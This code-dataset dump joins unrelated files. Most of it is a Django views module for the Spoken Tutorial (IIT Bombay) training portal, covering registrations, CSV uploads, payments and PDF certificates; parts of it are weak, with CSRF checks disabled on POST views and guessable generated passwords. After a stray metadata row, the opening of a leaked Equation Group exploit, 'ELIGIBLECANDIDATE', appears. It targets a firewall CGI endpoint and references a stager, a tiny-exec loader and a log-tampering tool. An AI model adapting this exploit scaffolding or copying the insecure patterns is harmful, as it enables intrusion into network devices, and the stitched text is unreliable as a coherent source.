from django.views.generic.edit import CreateView, UpdateView, DeleteView, FormView
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_protect, csrf_exempt
from django.core.exceptions import PermissionDenied
from django.contrib import messages
from django.http import HttpResponse, HttpResponseRedirect
from django.core.serializers import serialize
from django.db.models import Q
from django.contrib.auth.models import User
from django.urls import reverse
# Python imports
from datetime import datetime,date
import csv
import json
import random
import uuid
# Spoken imports
from .models import *
from .forms import *
from .helpers import *
from .templatetags.trainingdata import registartion_successful, get_event_details, get_user_detail
from creation.models import TutorialResource, Language, FossCategory
from events.decorators import group_required
from events.models import *
from events.views import is_resource_person, is_administrator, get_page, id_generator
from events.filters import ViewEventFilter, PaymentTransFilter, TrEventFilter
from cms.sortable import *
from cms.views import create_profile, send_registration_confirmation
from cms.models import Profile
from certificate.views import _clean_certificate_certificate
from django.http import HttpResponse
import os, sys
from string import Template
import subprocess
#pdf generate
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter, landscape
from reportlab.platypus import Paragraph
from reportlab.lib.styles import ParagraphStyle
from reportlab.lib.units import cm
from reportlab.lib.enums import TA_CENTER
from PyPDF2 import PdfFileWriter, PdfFileReader
from io import BytesIO
from django.conf import settings
from donate.models import *
import csv
today = date.today()
class TrainingEventCreateView(CreateView):
form_class = CreateTrainingEventForm
model = TrainingEvents
template_name = "create_event.html"
success_url = "/software-training/"
@method_decorator(group_required("Resource Person"))
def get(self, request, *args, **kwargs):
return render(self.request, self.template_name, {'form': self.form_class()})
def form_valid(self, form, **kwargs):
self.object = form.save(commit=False)
self.object.entry_user = self.request.user
self.object.Language_of_workshop = Language.objects.get(id=22)
self.object.save()
messages.success(self.request, "New Event created successfully.")
return HttpResponseRedirect(self.success_url)
#ILW main page
class TrainingEventsListView(ListView):
model = TrainingEvents
raw_get_data = None
header = None
collection = None
def dispatch(self, *args, **kwargs):
self.status = self.kwargs['status']
today = date.today()
self.show_myevents = False
if self.request.user:
myevents = TrainingEvents.objects.filter(id__in=Participant.objects.filter(user_id=self.request.user.id).values('event_id'))
if myevents:
self.show_myevents = True
if self.status == 'completed':
self.events = TrainingEvents.objects.filter(event_end_date__lt=today)
if self.status == 'ongoing':
self.events = TrainingEvents.objects.filter(event_end_date__gte=today)
if self.status == 'myevents':
participant = Participant.objects.filter(
Q(payment_status__status=1)|Q(registartion_type__in=(1,3)),
user_id=self.request.user.id)
self.events = participant
self.raw_get_data = self.request.GET.get('o', None)
self.queryset = get_sorted_list(
self.request,
self.events,
self.header,
self.raw_get_data
)
self.collection= ViewEventFilter(self.request.GET, queryset=self.queryset, user=self.request.user)
return super(TrainingEventsListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(TrainingEventsListView, self).get_context_data(**kwargs)
context['form'] = self.collection.form
page = self.request.GET.get('page')
collection = get_page(self.collection.qs, page)
context['collection'] = collection
context['ordering'] = get_field_index(self.raw_get_data)
context['status'] = self.status
context['events'] = self.events
context['show_myevents'] = self.show_myevents
context['ILW_ONLINE_TEST_URL'] = settings.ILW_ONLINE_TEST_URL
if self.request.user:
context['user'] = self.request.user
return context
@csrf_exempt
def register_user(request):
form = RegisterUser()
template_name = "register_user.html"
context = {}
context['form']= form
if request.user.is_authenticated():
user = request.user
profile = Profile.objects.get(user=user)
form.fields["name"].initial = user.get_full_name()
form.fields["email"].initial = getattr(user, 'email')
form.fields["phone"].initial = profile.phone
form.fields['email'].widget.attrs['readonly'] = True
if user.profile_set.all():
try:
form.fields["state"].initial = getattr(user.profile_set.all()[0], 'state')
college = user_college(request.user)
context['user_college'] = college
except Exception as e:
raise e
if request.method == 'POST':
event_id = request.POST.get("event_id_info")
if event_id:
event_register = TrainingEvents.objects.get(id=event_id)
langs = Language.objects.filter(id__in =
TutorialResource.objects.filter(
tutorial_detail__foss = event_register.foss, status=1).exclude(
language=event_register.Language_of_workshop).values('language').distinct())
context["langs"] = langs
form.fields["foss_language"].queryset = langs
gst = float(event_register.event_fee)* 0.18
context["gst"] = gst
form.fields["amount"].initial = float(event_register.event_fee) + gst
form.fields["amount"].widget.attrs['readonly'] = True
context['event_obj']= event_register
return render(request, template_name,context)
@csrf_exempt
def reg_success(request, user_type):
context = {}
template_name = "reg_success.html"
if request.method == 'POST':
name = request.POST.get('name')
email = request.POST.get('email')
phone = request.POST.get('phone')
event_obj = request.POST.get('event')
event = TrainingEvents.objects.get(id=event_obj)
form = RegisterUser(request.POST)
if form.is_valid():
form_data = form.save(commit=False)
form_data.user = request.user
form_data.event = event
try:
form_data.college = AcademicCenter.objects.get(institution_name=request.POST.get('college'))
except:
form_data.college = AcademicCenter.objects.get(id=request.POST.get('dropdown_college'))
user_data = is_user_paid(request.user, form_data.college.id)
if user_data[0]:
form_data.registartion_type = 1 #Subscribed College
else:
form_data.registartion_type = 2 #Manual reg- paid 500
part = Participant.objects.filter(
Q(payment_status__status = 1)|Q(registartion_type__in = (1,3)),
user = request.user, event = form_data.event)
if part.exists():
messages.success(request, "You have already registered for this event.")
return redirect('training:list_events', status='myevents')
else :
form_data.save()
event_name = event.event_name
userprofile = Profile.objects.get(user=request.user)
userprofile.phone = phone
userprofile.save()
if user_type == 'paid':
context = {'participant_obj':form_data}
return render(request, template_name, context)
else:
return form_data
else:
messages.warning(request, 'Invalid form payment request.')
return redirect('training:list_events', status='ongoing' )
class EventPraticipantsListView(ListView):
model = Participant
@method_decorator(group_required("Resource Person"))
def dispatch(self, *args, **kwargs):
self.eventid = self.kwargs['eventid']
self.queryset = Participant.objects.filter(event_id=self.eventid)
self.event = TrainingEvents.objects.get(id=self.eventid)
today = date.today()
self.training_status = 0 #ongoing
if self.event.event_end_date < today:
self.training_status = 1 #completed
return super(EventPraticipantsListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventPraticipantsListView, self).get_context_data(**kwargs)
context['training_status']= self.training_status
context['eventid']= self.eventid
context['event']= self.event
return context
class EventUpdateView(UpdateView):
model = TrainingEvents
form_class = CreateTrainingEventForm
success_url = "/training/event/rp/ongoing/"
#used to display evnets to mngrs under dashboard link
def listevents(request, role, status):
context = {}
user = request.user
if not (user.is_authenticated() and (is_resource_person(user) or is_administrator(user))):
raise PermissionDenied()
if (not role ) or (not status):
raise PermissionDenied()
states = State.objects.filter(resourceperson__user_id=user, resourceperson__status=1)
TrMngerEvents = TrainingEvents.objects.filter(state__in=states).order_by('-event_start_date')
status_list = {'ongoing': 0, 'completed': 1, 'closed': 2, 'expired': 3}
roles = ['rp', 'em']
if role in roles and status in status_list:
if status == 'ongoing':
queryset = TrMngerEvents.filter(training_status__lte=1, event_end_date__gte=today)
elif status == 'completed':
queryset =TrMngerEvents.filter(training_status=1, event_end_date__lt=today)
elif status == 'closed':
queryset = TrMngerEvents.filter(training_status=2)
elif status == 'expired':
queryset = TrMngerEvents.filter(training_status=0, event_end_date__lt=today)
header = {
1: SortableHeader('#', False),
2: SortableHeader(
'state__name',
True,
'State'
),
3: SortableHeader(
'host_college__academic_code',
True,
'Code'
),
4: SortableHeader(
'host_college__institution_name',
True,
'Institution'
),
5: SortableHeader('foss__foss', True, 'Foss Name'),
6: SortableHeader(
'event_coordinator_name',
True,
'Coordinator'
),
7: SortableHeader(
'registartion_end_date',
True,
'Registration Period'
),
8: SortableHeader(
'event_start_date',
True,
'Event Start Date'
),
9: SortableHeader(
'event_end_date',
True,
'Event End Date'
),
10: SortableHeader('Participant Count', True),
11: SortableHeader('Action', False)
}
event_type = request.GET.get('event_type', None)
pcount, mcount, fcount = get_all_events_detail(queryset, event_type) if event_type else get_all_events_detail(queryset)
raw_get_data = request.GET.get('o', None)
queryset = get_sorted_list(
request,
queryset,
header,
raw_get_data
)
collection= TrEventFilter(request.GET, queryset=queryset, user=user)
else:
raise PermissionDenied()
context['form'] = collection.form
page = request.GET.get('page')
collection = get_page(collection.qs, page)
context['collection'] = collection
context['role'] = role
context['status'] = status
context['header'] = header
context['today'] = today
context['ordering'] = get_field_index(raw_get_data)
context['pcount'] = pcount
context['mcount'] = mcount
context['fcount'] = fcount
return render(request,'event_status_list.html',context)
def close_event(request, pk):
context = {}
user = request.user
if not (user.is_authenticated() and is_resource_person(user)):
raise PermissionDenied()
event = TrainingEvents.objects.get(id=pk)
if event:
event.training_status = 2 #close event
event.save()
messages.success(request, 'Event has been closed successfully')
else:
messages.error(request, 'Request not sent.Please try again.')
return HttpResponseRedirect("/training/event/rp/completed/")
def approve_event_registration(request, pk):
context = {}
user = request.user
if not (user.is_authenticated() and is_resource_person(user)):
raise PermissionDenied()
event = TrainingEvents.objects.get(id=pk)
if event:
event.training_status = 1 #approve registraions
event.save()
messages.success(request, 'Registrations approved successfully')
else:
messages.error(request, 'Request not sent.Please try again.')
return HttpResponseRedirect("/training/event/rp/ongoing/")
class ParticipantCreateView(CreateView):
form_class = UploadParticipantsForm
@method_decorator(group_required("Resource Person"))
def dispatch(self, *args, **kwargs):
if 'eventid' in kwargs:
try:
self.event = TrainingEvents.objects.get(pk=kwargs['eventid'])
except:
messages.error(self.request, 'Event not found')
return HttpResponseRedirect(reverse("training:create_event"))
if not self.event.training_status == 0:
messages.error(self.request,'Upoad via CSV is not allowed as Event registration is closed')
return super(ParticipantCreateView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(ParticipantCreateView, self).get_context_data(**kwargs)
context['event']= self.event
return context
def form_valid(self, form):
count = 0
csv_file_data = form.cleaned_data['csv_file']
registartion_type = form.cleaned_data['registartion_type']
if registartion_type == 2:
# 3 - Manual Registration via CSV(option not visible outside)
registartion_type = 3
rows_data = csv.reader(csv_file_data, delimiter=',', quotechar='|')
csv_error = False
for i, row in enumerate(rows_data):
user = self.get_create_user(row)
try:
college = AcademicCenter.objects.get(academic_code=row[6])
except AcademicCenter.DoesNotExist:
csv_error = True
messages.add_message(self.request, messages.ERROR, "Row: "+ str(i+1) + " Institution name " + row[6] + " does not exist."+" Participant "+ row[2] + " was not created.")
continue
if registartion_type == 1:
if not(is_college_paid(college.id)):
messages.add_message(self.request, messages.ERROR, "Row: "+ str(i+1) + " Institution " + row[6] + " is not a Paid college."+" Participant "+ row[2] + " was not created.")
continue
try:
foss_language = Language.objects.get(name=row[7].strip())
except :
messages.add_message(self.request, messages.ERROR, "Row: "+ str(i+1) + " Language name " + row[7] + " does not exist."+" Participant "+ row[2] + " was not created.")
continue
participant = Participant.objects.filter(email=row[2].strip(),event = self.event)
if participant.exists() and registartion_successful(user, self.event):
messages.add_message(self.request, messages.WARNING, "Participant with email "+row[2]+" already registered for "+self.event.event_name)
continue
else:
try:
Participant.objects.create(
name = row[0]+" "+row[1],
email = row[2].strip(),
gender = row[3],
amount = row[4],
event = self.event,
user = user,
state = college.state,
college = college,
foss_language = foss_language,
registartion_type = registartion_type,
reg_approval_status = 1
)
count = count + 1
except :
csv_error = True
messages.add_message(self.request, messages.ERROR, "Could not create participant having email id" + row[2])
if csv_error:
messages.warning(self.request, 'Some rows in the csv file has errors and are not created.')
if count > 0:
messages.success(self.request, 'Successfully uploaded '+str(count)+" participants")
return HttpResponseRedirect(reverse("training:upload_participants", kwargs={'eventid': self.event.pk}))
def get_create_user(self, row):
try:
return User.objects.get(email=row[2].strip())
except User.DoesNotExist:
user = User(username=row[2], email=row[2].strip(), first_name=row[0], last_name=row[1])
user.set_password(row[0]+'@ST'+str(random.random()).split('.')[1][:5])
user.save()
create_profile(user, row[8].strip())
send_registration_confirmation(user)
return user
def mark_reg_approval(pid, eventid):
participant = Participant.objects.get(event_id =eventid, id=pid)
participant.reg_approval_status = 1
participant.save()
class EventAttendanceListView(ListView):
queryset = ""
unsuccessful_payee = ""
paginate_by = 500
success_url = ""
def dispatch(self, *args, **kwargs):
self.event = TrainingEvents.objects.get(pk=kwargs['eventid'])
main_query = Participant.objects.filter(event_id=kwargs['eventid'])
self.queryset = main_query.filter(Q(payment_status__status=1)| Q(registartion_type__in=(1,3)))
self.unsuccessful_payee = main_query.filter(payment_status__status__in=(0,2))
if self.event.training_status == 1:
self.queryset = main_query.filter(reg_approval_status=1)
if self.event.training_status == 2:
self.queryset = self.event.eventattendance_set.all()
return super(EventAttendanceListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventAttendanceListView, self).get_context_data(**kwargs)
context['event'] = self.event
context['eventid'] = self.event.id
context['unsuccessful_payee'] = self.unsuccessful_payee
return context
def post(self, request, *args, **kwargs):
self.object = None
self.user = request.user
eventid = kwargs['eventid']
attendance_type = request.POST.get('event_status', None)
if attendance_type == 'attend':
if request.POST and 'user' in request.POST:
marked_participant = request.POST.getlist('user', None)
# delete un marked record if exits
EventAttendance.objects.filter(event_id =eventid).exclude(participant_id__in = marked_participant).delete()
# insert new record if not exits
for record in marked_participant:
event_attend = EventAttendance.objects.filter(event_id =eventid, participant_id = record)
if not event_attend.exists():
EventAttendance.objects.create(event_id =eventid, participant_id = record)
#print marked_participant
success_url = '/training/event/rp/completed'
else:
EventAttendance.objects.filter(event_id = eventid).delete()
success_url = '/training/event/rp/completed'
elif attendance_type == 'reg':
if request.POST and 'user_reg' in request.POST:
marked_registrations = request.POST.getlist('user_reg', None)
# delete un marked record if exits
remove_reg = Participant.objects.filter(event_id =eventid, reg_approval_status=1).exclude(id__in = marked_registrations).update(reg_approval_status=0)
# insert new record if not exits
for record in marked_registrations:
reg_attend = Participant.objects.filter(event_id =eventid, id = record, reg_approval_status=1)
if not reg_attend.exists():
mark_reg_approval(record, eventid)
#print marked_registrations
success_url = '/training/event/rp/ongoing'
else:
Participant.objects.filter(event_id =eventid).update(reg_approval_status=0)
success_url = '/training/event/rp/ongoing'
return HttpResponseRedirect(success_url)
@csrf_exempt
def ajax_check_college(request):
college_id = request.POST.get("college_id")
user_details = is_user_paid(request.user, int(college_id))
check = False
if user_details[0]:
check = True
return HttpResponse(json.dumps(check), content_type='application/json')
def get_create_user(row):
try:
return User.objects.get(email=row[2].strip())
except User.DoesNotExist:
user = User(username=row[2], email=row[2].strip(), first_name=row[0], last_name=row[1])
user.set_password(row[0]+'@ST'+str(random.random()).split('.')[1][:5])
user.save()
create_profile(user, '')
send_registration_confirmation(user)
return user
from io import TextIOWrapper
from django.contrib.auth.decorators import login_required
@login_required
def upload_college_details(request):
form = UploadCollegeForm
context ={}
context['form'] = form
count = 0
csv_error = ''
if request.POST:
csv_file_data = TextIOWrapper(request.FILES['csv_file'], encoding='utf-8')
rows_data = csv.reader(csv_file_data, delimiter=',')
for i, row in enumerate(rows_data):
user = get_create_user(row)
try:
college = AcademicCenter.objects.get(academic_code=row[2])
except AcademicCenter.DoesNotExist:
csv_error = True
messages.add_message(request, messages.ERROR, "Row: "+ str(i+1) + " College" + row[2] + " does not exist.")
continue
try:
state = State.objects.get(name=row[1])
except State.DoesNotExist:
csv_error = True
messages.add_message(request, messages.ERROR, "Row: "+ str(i+1) + " State " + row[1] + " does not exist."+" College "+ row[2] + " was not added.")
continue
subscription = ''
payment_status = ''
college_type = ''
if '1 year' in row[7]:
subscription = '365'
if '6 months' in row[7]:
subscription = '180'
if row[11] == 'Engineering':
college_type = 'Engg'
day,mon,year = row[9].split('/')
payment_date = datetime(year=int(year), month=int(mon), day=int(day))
try:
ac_payment_new = AcademicPaymentStatus.objects.create(
state = state,
academic = college,
name_of_the_payer = row[3],
email = row[4],
phone = row[5],
amount = row[6],
subscription = subscription,
transactionid = row[8],
payment_date = payment_date,
payment_status = row[10],
college_type = college_type,
pan_number = row[12],
gst_number = row[13],
customer_id = row[14],
invoice_no = row[15],
remarks = row[16],
entry_date = payment_date,
entry_user = request.user
)
try:
add_Academic_key(ac_payment_new, subscription)
except :
messages.add_message(request, messages.ERROR, " Academic key for " + row[2]+" already exists")
count = count + 1
except :
academic_centre = AcademicPaymentStatus.objects.filter(
academic=college, transactionid= row[9], payment_date = payment_date)
if academic_centre.exists():
messages.add_message(request, messages.WARNING, "Institution "+row[2]+" already made payment on "+row[9])
else:
csv_error = True
messages.add_message(request, messages.ERROR, " Academic payment for " + row[2]+" already exists")
if csv_error:
messages.warning(request, 'Some rows in the csv file has errors and are not created.')
if count > 0:
messages.success(request, 'Successfully uploaded '+str(count)+" Institutions")
return render(request,'upload_college_details.html',context)
else:
return render(request,'upload_college_details.html',context)
return render(request,'upload_college_details.html',context)
def add_Academic_key(ac_pay_status_object, subscription):
u_key = uuid.uuid1()
hex_key = u_key.hex
Subscription_time = int(subscription)
expiry_date = ac_pay_status_object.payment_date + timedelta(days=Subscription_time)
ac_key = AcademicKey()
ac_key.ac_pay_status = ac_pay_status_object
ac_key.academic = ac_pay_status_object.academic
ac_key.u_key = u_key
ac_key.hex_key = hex_key
ac_key.expiry_date = expiry_date
ac_key.save()
class FDPTrainingCertificate(object):
def custom_strftime(self, format, t):
return t.strftime(format).replace('{S}', str(t.day) + self.suffix(t.day))
def suffix(self, d):
return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')
def create_fdptraining_certificate(self, event, participantname):
training_start = event.event_start_date
training_end = event.event_end_date
event_type = event.event_type
response = HttpResponse(content_type='application/pdf')
filename = (participantname+'-'+event.foss.foss+"-Participant-Certificate").replace(" ", "-");
response['Content-Disposition'] = 'attachment; filename='+filename+'.pdf'
imgTemp = BytesIO ()
imgDoc = canvas.Canvas(imgTemp)
# Title
imgDoc.setFont('Helvetica', 35, leading=None)
imgDoc.drawCentredString(405, 470, "Certificate of Participation")
#password
certificate_pass = ''
imgDoc.setFillColorRGB(211, 211, 211)
imgDoc.setFont('Helvetica', 10, leading=None)
imgDoc.drawString(10, 6, certificate_pass)
# Draw image on Canvas and save PDF in buffer
imgPath = settings.MEDIA_ROOT +"sign.jpg"
imgDoc.drawImage(imgPath, 600, 100, 150, 76)
#paragraphe
text = "This is to certify that <b>"+participantname +"</b> has participated in \
<b>"+event.get_event_type_display()+"</b> from <b>"\
+ str(training_start) +"</b> to <b>"+ str(training_end) +\
"</b> on <b>"+event.foss.foss+"</b> organized by <b>"+\
event.host_college.institution_name+\
"</b> with course material provided by Spoken Tutorial Project, IIT Bombay.\
<br /><br /> This training is offered by the Spoken Tutorial Project, IIT Bombay."
centered = ParagraphStyle(name = 'centered',
fontSize = 16,
leading = 30,
alignment = 0,
spaceAfter = 20
)
p = Paragraph(text, centered)
p.wrap(650, 200)
p.drawOn(imgDoc, 4.2 * cm, 7 * cm)
imgDoc.save()
# Use PyPDF to merge the image-PDF into the template
if event_type == "FDP":
page = PdfFileReader(open(settings.MEDIA_ROOT +"fdptr-certificate.pdf","rb")).getPage(0)
else:
page = PdfFileReader(open(settings.MEDIA_ROOT +"tr-certificate.pdf","rb")).getPage(0)
overlay = PdfFileReader(BytesIO(imgTemp.getvalue())).getPage(0)
page.mergePage(overlay)
#Save the result
output = PdfFileWriter()
output.addPage(page)
#stream to browser
outputStream = response
output.write(response)
outputStream.close()
return response
class EventTrainingCertificateView(FDPTrainingCertificate, View):
template_name = ""
def dispatch(self, *args, **kwargs):
return super(EventTrainingCertificateView, self).dispatch(*args, **kwargs)
def post(self, request, *args, **kwargs):
eventid = self.request.POST.get("eventid")
print(eventid)
event = TrainingEvents.objects.get(id=eventid)
participantname = self.request.user.first_name+" "+self.request.user.last_name
if event:
return self.create_fdptraining_certificate(event, participantname)
else:
messages.error(self.request, "Permission Denied!")
return HttpResponseRedirect("/")
class ParticipantTransactionsListView(ListView):
model = PaymentTransaction
raw_get_data = None
header = None
collection = None
@method_decorator(group_required("Resource Person","Administrator"))
def dispatch(self, *args, **kwargs):
today = date.today()
statenames = State.objects.filter(resourceperson__user_id=self.request.user, resourceperson__status=1).values('name')
self.PaymentTransaction = PaymentTransaction.objects.filter(paymentdetail__state__in=statenames).order_by('-created')
self.events = self.PaymentTransaction
self.header = {
1: SortableHeader('#', False),
2: SortableHeader(
'paymentdetail__user__first_name',
True,
'First Name'
),
3: SortableHeader(
'paymentdetail__user__last_name',
True,
'Last Name'
),
4: SortableHeader(
'paymentdetail__email',
True,
'Email'
),
5: SortableHeader(
'paymentdetail__state',
True,
'State'
),
6: SortableHeader('transId', True, 'Transaction id'),
7: SortableHeader('paymentdetail__user_id', True, 'UserId'),
8: SortableHeader('refNo', True, 'Reference No.'),
9: SortableHeader('status', True, 'Status'),
10: SortableHeader('paymentdetail__purpose', True, 'Purpose'),
11: SortableHeader('requestType', True, 'RequestType'),
12: SortableHeader('amount', True, 'Amount'),
13: SortableHeader('created', True, 'Entry Date'),
14: SortableHeader('paymentdetail__user', True, 'Phone'),
}
self.raw_get_data = self.request.GET.get('o', None)
self.purpose = self.request.GET.get('paymentdetail__purpose')
if self.purpose != 'cdcontent':
self.events= self.events.filter().exclude(paymentdetail__purpose='cdcontent')
self.queryset = get_sorted_list(
self.request,
self.events,
self.header,
self.raw_get_data
)
self.collection= PaymentTransFilter(self.request.GET, queryset=self.queryset, user=self.request.user)
self.total_amount = self.collection.qs.filter(requestType='R').aggregate(Sum('amount'))
return super(ParticipantTransactionsListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(ParticipantTransactionsListView, self).get_context_data(**kwargs)
context['form'] = self.collection.form
page = self.request.GET.get('page')
collection = get_page(self.collection.qs, page)
context['collection'] = collection
context['header'] = self.header
context['ordering'] = get_field_index(self.raw_get_data)
context['events'] = self.events
context['total_amount']=self.total_amount
if self.request.user:
context['user'] = self.request.user
return context
@csrf_exempt
def ajax_collage_event(request):
""" Ajax: Get the Colleges (Academic) based on District selected """
if request.method == 'POST':
college = request.POST.get('college')
print(college)
events = TrainingEvents.objects.filter(host_college_id=college).order_by('event_name')
print(events)
tmp = '<option value = None> --------- </option>'
if events:
for i in events:
tmp +='<option value='+str(i.id)+'>'+i.event_name+', '+i.event_type+'</option>'
return HttpResponse(json.dumps(tmp), content_type='application/json')
@csrf_protect
@login_required
def participant_transactions(request, purpose):
user = User.objects.get(id=request.user.id)
rp_states = ResourcePerson.objects.filter(status=1,user=user)
state = State.objects.filter(id__in=rp_states.values('state')).values('name')
context = {}
if request.method == 'GET':
form = TrainingManagerPaymentForm(user,request.GET)
allpaydetails = get_transaction_details(request, purpose)
request_type = request.GET.get('request_type')
if request_type == 'R':
context['total'] = allpaydetails.aggregate(Sum('amount'))
# else:
# form = TrainingManagerPaymentForm(user=request.user)
context['form'] = form
context['user'] = user
context['transactiondetails'] = allpaydetails
context['purpose'] = purpose
return render(request,'participant_transaction_list_new.html', context)
def transaction_csv(request, purpose):
# export statistics training data as csv
collectionSet = None
collection = get_transaction_details(request, purpose)
# Create the HttpResponse object with the appropriate CSV header.
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="training-statistics-data.csv"'
writer = csv.writer(response)
# header
if purpose != 'cdcontent':
writer.writerow(['Sr No', 'Event Details','Name', 'Email','State','User Id','Transaction Id',\
'Reference No','Status','Request Type','Amount','Entry Created','Phone Number'])
else:
writer.writerow(['Sr No', 'Name', 'Email','State','User Id','Transaction Id',\
'Reference No','Status','Request Type','Amount','Entry Created','Phone Number'])
count = 0
# records
for record in collection:
count=count+1
phone = get_user_detail(record.paymentdetail.user)
if purpose != 'cdcontent':
event = get_event_details(record.paymentdetail.purpose)
writer.writerow([count,
event.event_name+','+event.foss.foss,
record.paymentdetail.user.first_name+' '+record.paymentdetail.user.first_name,
record.paymentdetail.email,
record.paymentdetail.state,
record.paymentdetail.user_id,
record.transId,
record.refNo,
record.status,
record.requestType,
record.amount,
record.created,
phone])
else:
writer.writerow([count,
record.paymentdetail.user.first_name+' '+record.paymentdetail.user.first_name,
record.paymentdetail.email,
record.paymentdetail.state,
record.paymentdetail.user_id,
record.transId,
record.refNo,
record.status,
record.requestType,
record.amount,
record.created,
phone])
return response
def reopen_event(request, eventid):
context = {}
user = request.user
if not (user.is_authenticated() and is_resource_person(user)):
raise PermissionDenied()
event = TrainingEvents.objects.get(id=eventid)
if event:
event.training_status = 0 #close event
event.save()
messages.success(request, 'Event reopened successfully. As the event date over you will find this entry under expired tab.')
else:
messages.error(request, 'Request not sent.Please try again.')
return HttpResponseRedirect("/training/event/rp/completed/")
class EventParticipantsListView(ListView):
queryset = ""
unsuccessful_payee = ""
paginate_by = 500
success_url = ""
def dispatch(self, *args, **kwargs):
self.event = TrainingEvents.objects.get(pk=kwargs['eventid'])
main_query = Participant.objects.filter(event_id=kwargs['eventid'])
self.queryset = main_query.filter(Q(payment_status__status=1)| Q(registartion_type__in=(1,3)))
# self.unsuccessful_payee = main_query.filter(payment_status__status__in=(0,2))
if self.event.training_status == 1:
self.queryset = main_query.filter(reg_approval_status=1)
if self.event.training_status == 2:
self.queryset = self.event.eventattendance_set.all()
return super(EventParticipantsListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventParticipantsListView, self).get_context_data(**kwargs)
context['event'] = self.event
context['eventid'] = self.event.id
return context
@csrf_exempt
def ajax_add_teststatus(request):
partid = int(request.POST.get("partid"))
mdlcourseid = int(request.POST.get("mdlcourseid"))
mdlquizid = int(request.POST.get("mdlquizid"))
fossid = int(request.POST.get("fossid"))
eventid = int(request.POST.get("eventid"))
fossId = FossCategory.objects.get(id=fossid)
useremail = request.user.email
testentry = EventTestStatus()
testentry.participant_id= partid
testentry.event_id = eventid
testentry.mdlemail = useremail
testentry.fossid = fossId
testentry.mdlcourse_id = mdlcourseid
testentry.mdlquiz_id = mdlquizid
testentry.mdlattempt_id = 0
hasPrevEntry = EventTestStatus.objects.filter(participant_id=partid, event_id=eventid, mdlemail=useremail, fossid=fossId, mdlcourse_id=mdlcourseid, mdlquiz_id=mdlquizid, part_status__lt=2).first()
check = False
if not hasPrevEntry:
try:
testentry.save()
check = True
except:
check = False
else:
check = True
return HttpResponse(json.dumps(check), content_type='application/json')
class ILWTestCertificate(object):
def custom_strftime(self, format, t):
return t.strftime(format).replace('{S}', str(t.day) + self.suffix(t.day))
def suffix(self, d):
return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')
def create_ilwtest_certificate(self, event, participantname, teststatus):
training_start = event.event_start_date
training_end = event.event_end_date
event_type = event.event_type
response = HttpResponse(content_type='application/pdf')
filename = (participantname+'-'+teststatus.fossid.foss+"-Participant-Test-Certificate").replace(" ", "-");
response['Content-Disposition'] = 'attachment; filename='+filename+'.pdf'
imgTemp = BytesIO ()
imgDoc = canvas.Canvas(imgTemp)
# Title
imgDoc.setFont('Helvetica', 25, leading=None)
imgDoc.drawCentredString(405, 470, "Certificate for Completion of Training")
#password
certificate_pass = ''
if teststatus.cert_code:
certificate_pass = teststatus.cert_code
teststatus.part_status = 3 #certificate downloaded test over
teststatus.save()
else:
certificate_pass = str(teststatus.participant_id)+id_generator(10-len(str(teststatus.participant_id)))
teststatus.cert_code = certificate_pass
teststatus.part_status = 3 #certificate downloaded test over
teststatus.save()
imgDoc.setFillColorRGB(211, 211, 211)
imgDoc.setFont('Helvetica', 10, leading=None)
imgDoc.drawString(10, 6, certificate_pass)
# Draw image on Canvas and save PDF in buffer
imgPath = settings.MEDIA_ROOT +"sign.jpg"
imgDoc.drawImage(imgPath, 600, 100, 150, 76)
#paragraphe
text = "This is to certify that <b>"+participantname +"</b> successfully passed a \
<b>"+teststatus.fossid.foss+"</b> test, remotely conducted by the Spoken Tutorial project, IIT Bombay, under an honour invigilation system.\
<br /> Self learning through Spoken Tutorials and passing an online test completes the training programme."
centered = ParagraphStyle(name = 'centered',
fontSize = 16,
leading = 30,
alignment = 0,
spaceAfter = 20
)
p = Paragraph(text, centered)
p.wrap(650, 200)
p.drawOn(imgDoc, 4.2 * cm, 7 * cm)
imgDoc.save()
# Use PyPDF to merge the image-PDF into the template
if event_type == "FDP":
page = PdfFileReader(open(settings.MEDIA_ROOT +"fdptr-certificate.pdf","rb")).getPage(0)
else:
page = PdfFileReader(open(settings.MEDIA_ROOT +"tr-certificate.pdf","rb")).getPage(0)
overlay = PdfFileReader(BytesIO(imgTemp.getvalue())).getPage(0)
page.mergePage(overlay)
#Save the result
output = PdfFileWriter()
output.addPage(page)
#stream to browser
outputStream = response
output.write(response)
outputStream.close()
return response
class EventTestCertificateView(ILWTestCertificate, View):
template_name = ""
def dispatch(self, *args, **kwargs):
return super(EventTestCertificateView, self).dispatch(*args, **kwargs)
def post(self, request, *args, **kwargs):
eventid = self.request.POST.get("eventid")
print(eventid)
event = TrainingEvents.objects.get(id=eventid)
participantname = self.request.user.first_name+" "+self.request.user.last_name
teststatus = EventTestStatus.objects.filter(event_id=eventid, fossid=kwargs['testfossid'], mdlemail=self.request.user.email).first()
if event:
return self.create_ilwtest_certificate(event, participantname, teststatus)
else:
messages.error(self.request, "Permission Denied!")
return HttpResponseRedirect("/")
| gpl-3.0 | 419,593,190,258,104,260 | 33.176418 | 197 | 0.70187 | false |
DarthMaulware/EquationGroupLeaks | Leak #1 - Equation Group Cyber Weapons Auction - Invitation/EQGRP-Free-File/Firewall/EXPLOITS/ELCA/eligiblecandidate.py | 1 | 5274 | #!/usr/bin/env python2.7
import sys
import tarfile
from time import ctime,sleep
from StringIO import StringIO
from fosho import HTTPSExploit,run_exploit,randstr
from fosho.requests.exceptions import *
class ELCAExploit(HTTPSExploit):
name = "ELIGIBLECANDIDATE"
version = "v1.1.0.1"
desc="What is the sound of a single thread blocking?"
modes = ["nopen"]
exploit_url= "/cgi/maincgi.cgi"
target_url= "/site/image/white.gif"
stagerfn = "stage/stager.sh"
tinyexec = "stage/tiny-exec/tiny-exec"
setlog = "stage/setlog/setlog"
required_exploit = HTTPSExploit.required_exploit+["cid"]
required_probe = ["cid"]
required_survey = ["cid"]
required_clean = ["cid"]
timeout = 120
cfg = "ELCA.cfg"
@classmethod
def add_args(cur,cls):
